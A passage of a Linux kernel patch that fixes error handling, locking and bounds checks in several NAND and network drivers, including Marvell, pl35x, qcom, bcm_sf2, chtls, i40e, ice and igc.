+ 				  PSEC_TO_MSEC(sdr->tPROG_max));
+-	return ret;
++	if (ret)
++		return ret;
++
++	/* Check write status on the chip side */
++	ret = nand_status_op(chip, &status);
++	if (ret)
++		return ret;
++
++	if (status & NAND_STATUS_FAIL)
++		return -EIO;
++
++	return 0;
+ }
+ 
+ static int marvell_nfc_hw_ecc_hmg_write_page_raw(struct nand_chip *chip,
+@@ -1616,6 +1628,7 @@ static int marvell_nfc_hw_ecc_bch_write_page(struct nand_chip *chip,
+ 	int data_len = lt->data_bytes;
+ 	int spare_len = lt->spare_bytes;
+ 	int chunk, ret;
++	u8 status;
+ 
+ 	marvell_nfc_select_target(chip, chip->cur_cs);
+ 
+@@ -1652,6 +1665,14 @@ static int marvell_nfc_hw_ecc_bch_write_page(struct nand_chip *chip,
+ 	if (ret)
+ 		return ret;
+ 
++	/* Check write status on the chip side */
++	ret = nand_status_op(chip, &status);
++	if (ret)
++		return ret;
++
++	if (status & NAND_STATUS_FAIL)
++		return -EIO;
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/mtd/nand/raw/pl35x-nand-controller.c b/drivers/mtd/nand/raw/pl35x-nand-controller.c
+index 3c6f6aff649f8..7bcece135715d 100644
+--- a/drivers/mtd/nand/raw/pl35x-nand-controller.c
++++ b/drivers/mtd/nand/raw/pl35x-nand-controller.c
+@@ -513,6 +513,7 @@ static int pl35x_nand_write_page_hwecc(struct nand_chip *chip,
+ 	u32 addr1 = 0, addr2 = 0, row;
+ 	u32 cmd_addr;
+ 	int i, ret;
++	u8 status;
+ 
+ 	ret = pl35x_smc_set_ecc_mode(nfc, chip, PL35X_SMC_ECC_CFG_MODE_APB);
+ 	if (ret)
+@@ -565,6 +566,14 @@ static int pl35x_nand_write_page_hwecc(struct nand_chip *chip,
+ 	if (ret)
+ 		goto disable_ecc_engine;
+ 
++	/* Check write status on the chip side */
++	ret = nand_status_op(chip, &status);
++	if (ret)
++		goto disable_ecc_engine;
++
++	if (status & NAND_STATUS_FAIL)
++		ret = -EIO;
++
+ disable_ecc_engine:
+ 	pl35x_smc_set_ecc_mode(nfc, chip, PL35X_SMC_ECC_CFG_MODE_BYPASS);
+ 
+diff --git a/drivers/mtd/nand/raw/qcom_nandc.c b/drivers/mtd/nand/raw/qcom_nandc.c
+index 198a44794d2dc..fbf36cbcbb18d 100644
+--- a/drivers/mtd/nand/raw/qcom_nandc.c
++++ b/drivers/mtd/nand/raw/qcom_nandc.c
+@@ -3310,7 +3310,7 @@ err_nandc_alloc:
+ err_aon_clk:
+ 	clk_disable_unprepare(nandc->core_clk);
+ err_core_clk:
+-	dma_unmap_resource(dev, res->start, resource_size(res),
++	dma_unmap_resource(dev, nandc->base_dma, resource_size(res),
+ 			   DMA_BIDIRECTIONAL, 0);
+ 	return ret;
+ }
+diff --git a/drivers/mtd/nand/spi/micron.c b/drivers/mtd/nand/spi/micron.c
+index 50b7295bc9222..12601bc4227a7 100644
+--- a/drivers/mtd/nand/spi/micron.c
++++ b/drivers/mtd/nand/spi/micron.c
+@@ -12,7 +12,7 @@
+ 
+ #define SPINAND_MFR_MICRON		0x2c
+ 
+-#define MICRON_STATUS_ECC_MASK		GENMASK(7, 4)
++#define MICRON_STATUS_ECC_MASK		GENMASK(6, 4)
+ #define MICRON_STATUS_ECC_NO_BITFLIPS	(0 << 4)
+ #define MICRON_STATUS_ECC_1TO3_BITFLIPS	(1 << 4)
+ #define MICRON_STATUS_ECC_4TO6_BITFLIPS	(3 << 4)
+diff --git a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c
+index 7a3c7a74af04a..b170a3d8d007e 100644
+--- a/drivers/net/bonding/bond_main.c
++++ b/drivers/net/bonding/bond_main.c
+@@ -3990,7 +3990,7 @@ static inline const void *bond_pull_data(struct sk_buff *skb,
+ 	if (likely(n <= hlen))
+ 		return data;
+ 	else if (skb && likely(pskb_may_pull(skb, n)))
+-		return skb->head;
++		return skb->data;
+ 
+ 	return NULL;
+ }
+diff --git a/drivers/net/dsa/bcm_sf2.c b/drivers/net/dsa/bcm_sf2.c
+index 72374b066f64a..cd1f240c90f39 100644
+--- a/drivers/net/dsa/bcm_sf2.c
++++ b/drivers/net/dsa/bcm_sf2.c
+@@ -617,17 +617,16 @@ static int bcm_sf2_mdio_register(struct dsa_switch *ds)
+ 	dn = of_find_compatible_node(NULL, NULL, "brcm,unimac-mdio");
+ 	priv->master_mii_bus = of_mdio_find_bus(dn);
+ 	if (!priv->master_mii_bus) {
+-		of_node_put(dn);
+-		return -EPROBE_DEFER;
++		err = -EPROBE_DEFER;
++		goto err_of_node_put;
+ 	}
+ 
+-	get_device(&priv->master_mii_bus->dev);
+ 	priv->master_mii_dn = dn;
+ 
+ 	priv->slave_mii_bus = mdiobus_alloc();
+ 	if (!priv->slave_mii_bus) {
+-		of_node_put(dn);
+-		return -ENOMEM;
++		err = -ENOMEM;
++		goto err_put_master_mii_bus_dev;
+ 	}
+ 
+ 	priv->slave_mii_bus->priv = priv;
+@@ -684,11 +683,17 @@ static int bcm_sf2_mdio_register(struct dsa_switch *ds)
+ 	}
+ 
+ 	err = mdiobus_register(priv->slave_mii_bus);
+-	if (err && dn) {
+-		mdiobus_free(priv->slave_mii_bus);
+-		of_node_put(dn);
+-	}
++	if (err && dn)
++		goto err_free_slave_mii_bus;
+ 
++	return 0;
++
++err_free_slave_mii_bus:
++	mdiobus_free(priv->slave_mii_bus);
++err_put_master_mii_bus_dev:
++	put_device(&priv->master_mii_bus->dev);
++err_of_node_put:
++	of_node_put(dn);
+ 	return err;
+ }
+ 
+@@ -696,6 +701,7 @@ static void bcm_sf2_mdio_unregister(struct bcm_sf2_priv *priv)
+ {
+ 	mdiobus_unregister(priv->slave_mii_bus);
+ 	mdiobus_free(priv->slave_mii_bus);
++	put_device(&priv->master_mii_bus->dev);
+ 	of_node_put(priv->master_mii_dn);
+ }
+ 
+diff --git a/drivers/net/ethernet/chelsio/inline_crypto/chtls/chtls_io.c b/drivers/net/ethernet/chelsio/inline_crypto/chtls/chtls_io.c
+index a4256087ac828..5e45bef4fd34f 100644
+--- a/drivers/net/ethernet/chelsio/inline_crypto/chtls/chtls_io.c
++++ b/drivers/net/ethernet/chelsio/inline_crypto/chtls/chtls_io.c
+@@ -911,7 +911,7 @@ static int csk_wait_memory(struct chtls_dev *cdev,
+ 			   struct sock *sk, long *timeo_p)
+ {
+ 	DEFINE_WAIT_FUNC(wait, woken_wake_function);
+-	int err = 0;
++	int ret, err = 0;
+ 	long current_timeo;
+ 	long vm_wait = 0;
+ 	bool noblock;
+@@ -942,10 +942,13 @@ static int csk_wait_memory(struct chtls_dev *cdev,
+ 
+ 		set_bit(SOCK_NOSPACE, &sk->sk_socket->flags);
+ 		sk->sk_write_pending++;
+-		sk_wait_event(sk, &current_timeo, sk->sk_err ||
+-			      (sk->sk_shutdown & SEND_SHUTDOWN) ||
+-			      (csk_mem_free(cdev, sk) && !vm_wait), &wait);
++		ret = sk_wait_event(sk, &current_timeo, sk->sk_err ||
++				    (sk->sk_shutdown & SEND_SHUTDOWN) ||
++				    (csk_mem_free(cdev, sk) && !vm_wait),
++				    &wait);
+ 		sk->sk_write_pending--;
++		if (ret < 0)
++			goto do_error;
+ 
+ 		if (vm_wait) {
+ 			vm_wait -= current_timeo;
+@@ -1438,6 +1441,7 @@ static int chtls_pt_recvmsg(struct sock *sk, struct msghdr *msg, size_t len,
+ 	int copied = 0;
+ 	int target;
+ 	long timeo;
++	int ret;
+ 
+ 	buffers_freed = 0;
+ 
+@@ -1513,7 +1517,11 @@ static int chtls_pt_recvmsg(struct sock *sk, struct msghdr *msg, size_t len,
+ 		if (copied >= target)
+ 			break;
+ 		chtls_cleanup_rbuf(sk, copied);
+-		sk_wait_data(sk, &timeo, NULL);
++		ret = sk_wait_data(sk, &timeo, NULL);
++		if (ret < 0) {
++			copied = copied ? : ret;
++			goto unlock;
++		}
+ 		continue;
+ found_ok_skb:
+ 		if (!skb->len) {
+@@ -1608,6 +1616,8 @@ skip_copy:
+ 
+ 	if (buffers_freed)
+ 		chtls_cleanup_rbuf(sk, copied);
++
++unlock:
+ 	release_sock(sk);
+ 	return copied;
+ }
+@@ -1624,6 +1634,7 @@ static int peekmsg(struct sock *sk, struct msghdr *msg,
+ 	int copied = 0;
+ 	size_t avail;          /* amount of available data in current skb */
+ 	long timeo;
++	int ret;
+ 
+ 	lock_sock(sk);
+ 	timeo = sock_rcvtimeo(sk, flags & MSG_DONTWAIT);
+@@ -1675,7 +1686,12 @@ static int peekmsg(struct sock *sk, struct msghdr *msg,
+ 			release_sock(sk);
+ 			lock_sock(sk);
+ 		} else {
+-			sk_wait_data(sk, &timeo, NULL);
++			ret = sk_wait_data(sk, &timeo, NULL);
++			if (ret < 0) {
++				/* here 'copied' is 0 due to previous checks */
++				copied = ret;
++				break;
++			}
+ 		}
+ 
+ 		if (unlikely(peek_seq != tp->copied_seq)) {
+@@ -1746,6 +1762,7 @@ int chtls_recvmsg(struct sock *sk, struct msghdr *msg, size_t len,
+ 	int copied = 0;
+ 	long timeo;
+ 	int target;             /* Read at least this many bytes */
++	int ret;
+ 
+ 	buffers_freed = 0;
+ 
+@@ -1837,7 +1854,11 @@ int chtls_recvmsg(struct sock *sk, struct msghdr *msg, size_t len,
+ 		if (copied >= target)
+ 			break;
+ 		chtls_cleanup_rbuf(sk, copied);
+-		sk_wait_data(sk, &timeo, NULL);
++		ret = sk_wait_data(sk, &timeo, NULL);
++		if (ret < 0) {
++			copied = copied ? : ret;
++			goto unlock;
++		}
+ 		continue;
+ 
+ found_ok_skb:
+@@ -1906,6 +1927,7 @@ skip_copy:
+ 	if (buffers_freed)
+ 		chtls_cleanup_rbuf(sk, copied);
+ 
++unlock:
+ 	release_sock(sk);
+ 	return copied;
+ }
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_common.c b/drivers/net/ethernet/intel/i40e/i40e_common.c
+index 82e06272158df..6266756b47b9d 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_common.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_common.c
+@@ -1082,7 +1082,7 @@ void i40e_clear_hw(struct i40e_hw *hw)
+ 		     I40E_PFLAN_QALLOC_FIRSTQ_SHIFT;
+ 	j = (val & I40E_PFLAN_QALLOC_LASTQ_MASK) >>
+ 	    I40E_PFLAN_QALLOC_LASTQ_SHIFT;
+-	if (val & I40E_PFLAN_QALLOC_VALID_MASK)
++	if (val & I40E_PFLAN_QALLOC_VALID_MASK && j >= base_queue)
+ 		num_queues = (j - base_queue) + 1;
+ 	else
+ 		num_queues = 0;
+@@ -1092,7 +1092,7 @@ void i40e_clear_hw(struct i40e_hw *hw)
+ 	    I40E_PF_VT_PFALLOC_FIRSTVF_SHIFT;
+ 	j = (val & I40E_PF_VT_PFALLOC_LASTVF_MASK) >>
+ 	    I40E_PF_VT_PFALLOC_LASTVF_SHIFT;
+-	if (val & I40E_PF_VT_PFALLOC_VALID_MASK)
++	if (val & I40E_PF_VT_PFALLOC_VALID_MASK && j >= i)
+ 		num_vfs = (j - i) + 1;
+ 	else
+ 		num_vfs = 0;
+diff --git a/drivers/net/ethernet/intel/ice/ice_lib.c b/drivers/net/ethernet/intel/ice/ice_lib.c
+index 7276badfa19ea..c051503c3a892 100644
+--- a/drivers/net/ethernet/intel/ice/ice_lib.c
++++ b/drivers/net/ethernet/intel/ice/ice_lib.c
+@@ -1100,8 +1100,7 @@ static void ice_set_rss_vsi_ctx(struct ice_vsi_ctx *ctxt, struct ice_vsi *vsi)
+ 
+ 	ctxt->info.q_opt_rss = ((lut_type << ICE_AQ_VSI_Q_OPT_RSS_LUT_S) &
+ 				ICE_AQ_VSI_Q_OPT_RSS_LUT_M) |
+-				((hash_type << ICE_AQ_VSI_Q_OPT_RSS_HASH_S) &
+-				 ICE_AQ_VSI_Q_OPT_RSS_HASH_M);
++				(hash_type & ICE_AQ_VSI_Q_OPT_RSS_HASH_M);
+ }
+ 
+ static void
+diff --git a/drivers/net/ethernet/intel/ice/ice_main.c b/drivers/net/ethernet/intel/ice/ice_main.c
+index 3f98781e74b28..f0f39364819ac 100644
+--- a/drivers/net/ethernet/intel/ice/ice_main.c
++++ b/drivers/net/ethernet/intel/ice/ice_main.c
+@@ -6,6 +6,7 @@
+ #define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
+ 
+ #include <generated/utsrelease.h>
++#include <linux/crash_dump.h>
+ #include "ice.h"
+ #include "ice_base.h"
+ #include "ice_lib.h"
+@@ -4681,6 +4682,20 @@ ice_probe(struct pci_dev *pdev, const struct pci_device_id __always_unused *ent)
+ 		return -EINVAL;
+ 	}
+ 
++	/* when under a kdump kernel initiate a reset before enabling the
++	 * device in order to clear out any pending DMA transactions. These
++	 * transactions can cause some systems to machine check when doing
++	 * the pcim_enable_device() below.
++	 */
++	if (is_kdump_kernel()) {
++		pci_save_state(pdev);
++		pci_clear_master(pdev);
++		err = pcie_flr(pdev);
++		if (err)
++			return err;
++		pci_restore_state(pdev);
++	}
++
+ 	/* this driver uses devres, see
+ 	 * Documentation/driver-api/driver-model/devres.rst
+ 	 */
+@@ -4708,7 +4723,6 @@ ice_probe(struct pci_dev *pdev, const struct pci_device_id __always_unused *ent)
+ 		return err;
+ 	}
+ 
+-	pci_enable_pcie_error_reporting(pdev);
+ 	pci_set_master(pdev);
+ 
+ 	pf->pdev = pdev;
+@@ -5001,7 +5015,6 @@ err_init_pf_unroll:
+ 	ice_devlink_destroy_regions(pf);
+ 	ice_deinit_hw(hw);
+ err_exit_unroll:
+-	pci_disable_pcie_error_reporting(pdev);
+ 	pci_disable_device(pdev);
+ 	return err;
+ }
+@@ -5127,7 +5140,6 @@ static void ice_remove(struct pci_dev *pdev)
+ 	ice_reset(&pf->hw, ICE_RESET_PFR);
+ 	pci_wait_for_pending_transaction(pdev);
+ 	ice_clear_interrupt_scheme(pf);
+-	pci_disable_pcie_error_reporting(pdev);
+ 	pci_disable_device(pdev);
+ }
+ 
+diff --git a/drivers/net/ethernet/intel/igc/igc.h b/drivers/net/ethernet/intel/igc/igc.h
+index d3b17aa1d1a83..43c05b41627f7 100644
+--- a/drivers/net/ethernet/intel/igc/igc.h
++++ b/drivers/net/ethernet/intel/igc/igc.h
+@@ -183,9 +183,11 @@ struct igc_adapter {
+ 	u32 max_frame_size;
+ 	u32 min_frame_size;
+ 
++	int tc_setup_type;
+ 	ktime_t base_time;
+ 	ktime_t cycle_time;
+ 	bool qbv_enable;
++	u32 qbv_config_change_errors;
+ 
+ 	/* OS defined structs */
+ 	struct pci_dev *pdev;
+@@ -228,6 +230,10 @@ struct igc_adapter {
+ 	struct ptp_clock *ptp_clock;
+ 	struct ptp_clock_info ptp_caps;
+ 	struct work_struct ptp_tx_work;
++	/* Access to ptp_tx_skb and ptp_tx_start are protected by the
++	 * ptp_tx_lock.
++	 */
++	spinlock_t ptp_tx_lock;
+ 	struct sk_buff *ptp_tx_skb;
+ 	struct hwtstamp_config tstamp_config;
+ 	unsigned long ptp_tx_start;
+@@ -429,7 +435,6 @@ enum igc_state_t {
+ 	__IGC_TESTING,
+ 	__IGC_RESETTING,
+ 	__IGC_DOWN,
+-	__IGC_PTP_TX_IN_PROGRESS,
+ };
+ 
+ enum igc_tx_flags {
+diff --git a/drivers/net/ethernet/intel/igc/igc_base.c b/drivers/net/ethernet/intel/igc/igc_base.c
+index a15927e772720..a1d815af507d9 100644
+--- a/drivers/net/ethernet/intel/igc/igc_base.c
++++ b/drivers/net/ethernet/intel/igc/igc_base.c
+@@ -396,6 +396,35 @@ void igc_rx_fifo_flush_base(struct igc_hw *hw)
+ 	rd32(IGC_MPC);
+ }
+ 
++bool igc_is_device_id_i225(struct igc_hw *hw)
++{
++	switch (hw->device_id) {
++	case IGC_DEV_ID_I225_LM:
++	case IGC_DEV_ID_I225_V:
++	case IGC_DEV_ID_I225_I:
++	case IGC_DEV_ID_I225_K:
++	case IGC_DEV_ID_I225_K2:
++	case IGC_DEV_ID_I225_LMVP:
++	case IGC_DEV_ID_I225_IT:
++		return true;
++	default:
++		return false;
++	}
++}
++
++bool igc_is_device_id_i226(struct igc_hw *hw)
++{
++	switch (hw->device_id) {
++	case IGC_DEV_ID_I226_LM:
++	case IGC_DEV_ID_I226_V:
++	case IGC_DEV_ID_I226_K:
++	case IGC_DEV_ID_I226_IT:
++		return true;
++	default:
++		return false;
++	}
++}
++
+ static struct igc_mac_operations igc_mac_ops_base = {
+ 	.init_hw		= igc_init_hw_base,
+ 	.check_for_link		= igc_check_for_copper_link,
+diff --git a/drivers/net/ethernet/intel/igc/igc_base.h b/drivers/net/ethernet/intel/igc/igc_base.h
+index 52849f5e8048d..9f3827eda157c 100644
+--- a/drivers/net/ethernet/intel/igc/igc_base.h
++++ b/drivers/net/ethernet/intel/igc/igc_base.h
+@@ -7,6 +7,8 @@
+ /* forward declaration */
+ void igc_rx_fifo_flush_base(struct igc_hw *hw);
+ void igc_power_down_phy_copper_base(struct igc_hw *hw);
++bool igc_is_device_id_i225(struct igc_hw *hw);
++bool igc_is_device_id_i226(struct igc_hw *hw);
+ 
+ /* Transmit Descriptor - Advanced */
+ union igc_adv_tx_desc {
+diff --git a/drivers/net/ethernet/intel/igc/igc_defines.h b/drivers/net/ethernet/intel/igc/igc_defines.h
+index 90ca01889cd82..efdabcbd66ddd 100644
+--- a/drivers/net/ethernet/intel/igc/igc_defines.h
++++ b/drivers/net/ethernet/intel/igc/igc_defines.h
+@@ -515,6 +515,7 @@
+ /* Transmit Scheduling */
+ #define IGC_TQAVCTRL_TRANSMIT_MODE_TSN	0x00000001
+ #define IGC_TQAVCTRL_ENHANCED_QAV	0x00000008
++#define IGC_TQAVCTRL_FUTSCDDIS		0x00000080
+ 
+ #define IGC_TXQCTL_QUEUE_MODE_LAUNCHT	0x00000001
+ #define IGC_TXQCTL_STRICT_CYCLE		0x00000002
+diff --git a/drivers/net/ethernet/intel/igc/igc_ethtool.c b/drivers/net/ethernet/intel/igc/igc_ethtool.c
+index 9166fde40c772..e23b95edb05ef 100644
+--- a/drivers/net/ethernet/intel/igc/igc_ethtool.c
++++ b/drivers/net/ethernet/intel/igc/igc_ethtool.c
+@@ -67,6 +67,7 @@ static const struct igc_stats igc_gstrings_stats[] = {
+ 	IGC_STAT("rx_hwtstamp_cleared", rx_hwtstamp_cleared),
+ 	IGC_STAT("tx_lpi_counter", stats.tlpic),
+ 	IGC_STAT("rx_lpi_counter", stats.rlpic),
++	IGC_STAT("qbv_config_change_errors", qbv_config_change_errors),
+ };
+ 
+ #define IGC_NETDEV_STAT(_net_stat) { \
+diff --git a/drivers/net/ethernet/intel/igc/igc_main.c b/drivers/net/ethernet/intel/igc/igc_main.c
+index 1ac836a55cd31..4b6f882b380dc 100644
+--- a/drivers/net/ethernet/intel/igc/igc_main.c
++++ b/drivers/net/ethernet/intel/igc/igc_main.c
+@@ -1606,9 +1606,10 @@ done:
+ 		 * the other timer registers before skipping the
+ 		 * timestamping request.
+ 		 */
+-		if (adapter->tstamp_config.tx_type == HWTSTAMP_TX_ON &&
+-		    !test_and_set_bit_lock(__IGC_PTP_TX_IN_PROGRESS,
+-					   &adapter->state)) {
++		unsigned long flags;
++
++		spin_lock_irqsave(&adapter->ptp_tx_lock, flags);
++		if (adapter->tstamp_config.tx_type == HWTSTAMP_TX_ON && !adapter->ptp_tx_skb) {
+ 			skb_shinfo(skb)->tx_flags |= SKBTX_IN_PROGRESS;
+ 			tx_flags |= IGC_TX_FLAGS_TSTAMP;
+ 
+@@ -1617,6 +1618,8 @@ done:
+ 		} else {
+ 			adapter->tx_hwtstamp_skipped++;
+ 		}
++
++		spin_unlock_irqrestore(&adapter->ptp_tx_lock, flags);
+ 	}
+ 
+ 	if (skb_vlan_tag_present(skb)) {
+@@ -6035,6 +6038,7 @@ static bool validate_schedule(struct igc_adapter *adapter,
+ 			      const struct tc_taprio_qopt_offload *qopt)
+ {
+ 	int queue_uses[IGC_MAX_TX_QUEUES] = { };
++	struct igc_hw *hw = &adapter->hw;
+ 	struct timespec64 now;
+ 	size_t n;
+ 
+@@ -6047,8 +6051,10 @@ static bool validate_schedule(struct igc_adapter *adapter,
+ 	 * in the future, it will hold all the packets until that
+ 	 * time, causing a lot of TX Hangs, so to avoid that, we
+ 	 * reject schedules that would start in the future.
++	 * Note: Limitation above is no longer in i226.
+ 	 */
+-	if (!is_base_time_past(qopt->base_time, &now))
++	if (!is_base_time_past(qopt->base_time, &now) &&
++	    igc_is_device_id_i225(hw))
+ 		return false;
+ 
+ 	for (n = 0; n < qopt->num_entries; n++) {
+@@ -6103,6 +6109,7 @@ static int igc_tsn_clear_schedule(struct igc_adapter *adapter)
+ 
+ 	adapter->base_time = 0;
+ 	adapter->cycle_time = NSEC_PER_SEC;
++	adapter->qbv_config_change_errors = 0;
+ 
+ 	for (i = 0; i < adapter->num_tx_queues; i++) {
+ 		struct igc_ring *ring = adapter->tx_ring[i];
+@@ -6118,6 +6125,7 @@ static int igc_save_qbv_schedule(struct igc_adapter *adapter,
+ 				 struct tc_taprio_qopt_offload *qopt)
+ {
+ 	bool queue_configured[IGC_MAX_TX_QUEUES] = { };
++	struct igc_hw *hw = &adapter->hw;
+ 	u32 start_time = 0, end_time = 0;
+ 	size_t n;
+ 	int i;
+@@ -6130,7 +6138,7 @@ static int igc_save_qbv_schedule(struct igc_adapter *adapter,
+ 	if (qopt->base_time < 0)
+ 		return -ERANGE;
+ 
+-	if (adapter->base_time)
++	if (igc_is_device_id_i225(hw) && adapter->base_time)
+ 		return -EALREADY;
+ 
+ 	if (!validate_schedule(adapter, qopt))
+@@ -6283,6 +6291,8 @@ static int igc_setup_tc(struct net_device *dev, enum tc_setup_type type,
+ {
+ 	struct igc_adapter *adapter = netdev_priv(dev);
+ 
++	adapter->tc_setup_type = type;
++
+ 	switch (type) {
+ 	case TC_SETUP_QDISC_TAPRIO:
+ 		return igc_tsn_enable_qbv_scheduling(adapter, type_data);
+diff --git a/drivers/net/ethernet/intel/igc/igc_ptp.c b/drivers/net/ethernet/intel/igc/igc_ptp.c
+index d96cdccdc1e1e..14cd7f995280d 100644
+--- a/drivers/net/ethernet/intel/igc/igc_ptp.c
++++ b/drivers/net/ethernet/intel/igc/igc_ptp.c
+@@ -622,6 +622,7 @@ static int igc_ptp_set_timestamp_mode(struct igc_adapter *adapter,
+ 	return 0;
+ }
+ 
++/* Requires adapter->ptp_tx_lock held by caller. */
+ static void igc_ptp_tx_timeout(struct igc_adapter *adapter)
+ {
+ 	struct igc_hw *hw = &adapter->hw;
+@@ -629,7 +630,6 @@ static void igc_ptp_tx_timeout(struct igc_adapter *adapter)
+ 	dev_kfree_skb_any(adapter->ptp_tx_skb);
+ 	adapter->ptp_tx_skb = NULL;
+ 	adapter->tx_hwtstamp_timeouts++;
+-	clear_bit_unlock(__IGC_PTP_TX_IN_PROGRESS, &adapter->state);
+ 	/* Clear the tx valid bit in TSYNCTXCTL register to enable interrupt. */
+ 	rd32(IGC_TXSTMPH);
+ 	netdev_warn(adapter->netdev, "Tx timestamp timeout\n");
+@@ -637,20 +637,20 @@ static void igc_ptp_tx_timeout(struct igc_adapter *adapter)
+ 
+ void igc_ptp_tx_hang(struct igc_adapter *adapter)
+ {
+-	bool timeout = time_is_before_jiffies(adapter->ptp_tx_start +
+-					      IGC_PTP_TX_TIMEOUT);
++	unsigned long flags;
+ 
+-	if (!test_bit(__IGC_PTP_TX_IN_PROGRESS, &adapter->state))
+-		return;
++	spin_lock_irqsave(&adapter->ptp_tx_lock, flags);
+ 
+-	/* If we haven't received a timestamp within the timeout, it is
+-	 * reasonable to assume that it will never occur, so we can unlock the
+-	 * timestamp bit when this occurs.
+-	 */
+-	if (timeout) {
+-		cancel_work_sync(&adapter->ptp_tx_work);
+-		igc_ptp_tx_timeout(adapter);
+-	}
++	if (!adapter->ptp_tx_skb)
++		goto unlock;
++
++	if (time_is_after_jiffies(adapter->ptp_tx_start + IGC_PTP_TX_TIMEOUT))
++		goto unlock;
++
++	igc_ptp_tx_timeout(adapter);
++
++unlock:
++	spin_unlock_irqrestore(&adapter->ptp_tx_lock, flags);
+ }
+ 
+ /**
+@@ -660,6 +660,8 @@ void igc_ptp_tx_hang(struct igc_adapter *adapter)
+  * If we were asked to do hardware stamping and such a time stamp is
+  * available, then it must have been for this skb here because we only
+  * allow only one such packet into the queue.
++ *
++ * Context: Expects adapter->ptp_tx_lock to be held by caller.
+  */
+ static void igc_ptp_tx_hwtstamp(struct igc_adapter *adapter)
+ {
+@@ -695,13 +697,7 @@ static void igc_ptp_tx_hwtstamp(struct igc_adapter *adapter)
+ 	shhwtstamps.hwtstamp =
+ 		ktime_add_ns(shhwtstamps.hwtstamp, adjust);
+ 
+-	/* Clear the lock early before calling skb_tstamp_tx so that
+-	 * applications are not woken up before the lock bit is clear. We use
+-	 * a copy of the skb pointer to ensure other threads can't change it
+-	 * while we're notifying the stack.
+-	 */
+ 	adapter->ptp_tx_skb = NULL;
+-	clear_bit_unlock(__IGC_PTP_TX_IN_PROGRESS, &adapter->state);
+ 
+ 	/* Notify the stack and free the skb after we've unlocked */
+ 	skb_tstamp_tx(skb, &shhwtstamps);
+@@ -712,24 +708,33 @@ static void igc_ptp_tx_hwtstamp(struct igc_adapter *adapter)
+  * igc_ptp_tx_work
+  * @work: pointer to work struct
+  *
+- * This work function polls the TSYNCTXCTL valid bit to determine when a
+- * timestamp has been taken for the current stored skb.
++ * This work function checks the TSYNCTXCTL valid bit to determine when
++ * a timestamp has been taken for the current stored skb.
+  */
+ static void igc_ptp_tx_work(struct work_struct *work)
+ {
+ 	struct igc_adapter *adapter = container_of(work, struct igc_adapter,
+ 						   ptp_tx_work);
+ 	struct igc_hw *hw = &adapter->hw;
++	unsigned long flags;
+ 	u32 tsynctxctl;
+ 
+-	if (!test_bit(__IGC_PTP_TX_IN_PROGRESS, &adapter->state))
+-		return;
++	spin_lock_irqsave(&adapter->ptp_tx_lock, flags);
++
++	if (!adapter->ptp_tx_skb)
++		goto unlock;
+ 
+ 	tsynctxctl = rd32(IGC_TSYNCTXCTL);
+-	if (WARN_ON_ONCE(!(tsynctxctl & IGC_TSYNCTXCTL_TXTT_0)))
+-		return;
++	tsynctxctl &= IGC_TSYNCTXCTL_TXTT_0;
++	if (!tsynctxctl) {
++		WARN_ONCE(1, "Received a TSTAMP interrupt but no TSTAMP is ready.\n");
++		goto unlock;
++	}
+ 
+ 	igc_ptp_tx_hwtstamp(adapter);
++
++unlock:
++	spin_unlock_irqrestore(&adapter->ptp_tx_lock, flags);
+ }
+ 
+ /**
+@@ -978,6 +983,7 @@ void igc_ptp_init(struct igc_adapter *adapter)
+ 		return;
+ 	}
+ 
++	spin_lock_init(&adapter->ptp_tx_lock);
+ 	spin_lock_init(&adapter->tmreg_lock);
+ 	INIT_WORK(&adapter->ptp_tx_work, igc_ptp_tx_work);
+ 
+@@ -1042,7 +1048,6 @@ void igc_ptp_suspend(struct igc_adapter *adapter)
+ 	cancel_work_sync(&adapter->ptp_tx_work);
+ 	dev_kfree_skb_any(adapter->ptp_tx_skb);
+ 	adapter->ptp_tx_skb = NULL;
+-	clear_bit_unlock(__IGC_PTP_TX_IN_PROGRESS, &adapter->state);
+ 
+ 	if (pci_device_is_present(adapter->pdev)) {
+ 		igc_ptp_time_save(adapter);
+diff --git a/drivers/net/ethernet/intel/igc/igc_tsn.c b/drivers/net/ethernet/intel/igc/igc_tsn.c
+index 356c7455c5cee..725db36e399d2 100644
+--- a/drivers/net/ethernet/intel/igc/igc_tsn.c
++++ b/drivers/net/ethernet/intel/igc/igc_tsn.c
+@@ -2,6 +2,7 @@
+ /* Copyright (c)  2019 Intel Corporation */
+ 
+ #include "igc.h"
++#include "igc_hw.h"
+ #include "igc_tsn.h"
+ 
+ static bool is_any_launchtime(struct igc_adapter *adapter)
+@@ -62,7 +63,8 @@ static int igc_tsn_disable_offload(struct igc_adapter *adapter)
+ 
+ 	tqavctrl = rd32(IGC_TQAVCTRL);
+ 	tqavctrl &= ~(IGC_TQAVCTRL_TRANSMIT_MODE_TSN |
+-		      IGC_TQAVCTRL_ENHANCED_QAV);
++		      IGC_TQAVCTRL_ENHANCED_QAV | IGC_TQAVCTRL_FUTSCDDIS);
++
+ 	wr32(IGC_TQAVCTRL, tqavctrl);
+ 
+ 	for (i = 0; i < adapter->num_tx_queues; i++) {
+@@ -82,25 +84,16 @@ static int igc_tsn_disable_offload(struct igc_adapter *adapter)
+ static int igc_tsn_enable_offload(struct igc_adapter *adapter)
+ {
+ 	struct igc_hw *hw = &adapter->hw;
++	bool tsn_mode_reconfig = false;
+ 	u32 tqavctrl, baset_l, baset_h;
+ 	u32 sec, nsec, cycle;
+ 	ktime_t base_time, systim;
+ 	int i;
+ 
+-	cycle = adapter->cycle_time;
+-	base_time = adapter->base_time;
+-
+ 	wr32(IGC_TSAUXC, 0);
+ 	wr32(IGC_DTXMXPKTSZ, IGC_DTXMXPKTSZ_TSN);
+ 	wr32(IGC_TXPBS, IGC_TXPBSIZE_TSN);
+ 
+-	tqavctrl = rd32(IGC_TQAVCTRL);
+-	tqavctrl |= IGC_TQAVCTRL_TRANSMIT_MODE_TSN | IGC_TQAVCTRL_ENHANCED_QAV;
+-	wr32(IGC_TQAVCTRL, tqavctrl);
+-
+-	wr32(IGC_QBVCYCLET_S, cycle);
+-	wr32(IGC_QBVCYCLET, cycle);
+-
+ 	for (i = 0; i < adapter->num_tx_queues; i++) {
+ 		struct igc_ring *ring = adapter->tx_ring[i];
+ 		u32 txqctl = 0;
+@@ -203,21 +196,58 @@ skip_cbs:
+ 		wr32(IGC_TXQCTL(i), txqctl);
+ 	}
+ 
